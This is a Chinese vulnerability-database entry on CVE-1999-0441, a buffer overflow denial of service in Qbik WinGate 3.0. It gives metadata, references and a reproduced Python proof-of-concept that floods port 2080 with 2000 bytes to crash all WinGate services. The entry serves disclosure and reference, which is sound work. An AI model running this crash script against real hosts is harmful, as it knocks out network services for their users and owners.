Qbik WinGate缓冲区溢出DoS漏洞

Qbik WinGate缓冲区溢出DoS漏洞

漏洞ID 1105419 漏洞类型 缓冲区溢出
发布时间 1999-02-22 更新时间 2005-05-02
图片[1]-Qbik WinGate缓冲区溢出DoS漏洞-安全小百科CVE编号 CVE-1999-0441
图片[2]-Qbik WinGate缓冲区溢出DoS漏洞-安全小百科CNNVD-ID CNNVD-199902-052
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19410
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199902-052
|漏洞详情
WinGate机器存在漏洞。远程攻击者可以使用WinsockRedirectorService上的一个缓冲区溢出导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/509/info

WinGate's Winsock redirector service is susceptible to a buffer overflow vilnerability that will crash all WinGate services.

#!/usr/bin/python
#
# Qbik Wingate 3.0 DoS Proof of Concept Code.
# Vulnerability Discovered by eEye Digital Security
Team(http://www.eEye.com)
# Simple Script by Prizm([email protected])
# 
# By connecting to port 2080 on a system running Qbik Wingate 3.0 and
# sending 2000
# characters, all wingate services will crash.
# *Solution* Upgrade to 4.0.1, version is not vulnerable to this Denial of
# Service attack. 
#
# This *simple* little script will crash all wingate services.


import socket
import sys
from string import strip

host="xxx.xxx.xxx.xxx" # Replace x's with IP.
port=2080
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
  s.connect(host,port)
  print "connection succeeded."
except socket.error, e:
  print "connection failed, " + e.args

s.send("A" * 2000)

#end
|参考资料

来源:BID
名称:509
链接:http://www.securityfocus.com/bid/509
来源:EEYE
名称:AD02221999
链接:http://www.eeye.com/html/Research/Advisories/AD02221999.html

相关推荐: APC PowerChute Plus 4.2.2 – Denial of Service

APC PowerChute Plus 4.2.2 – Denial of Service 漏洞ID 1053367 漏洞类型 发布时间 1998-04-10 更新时间 1998-04-10 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享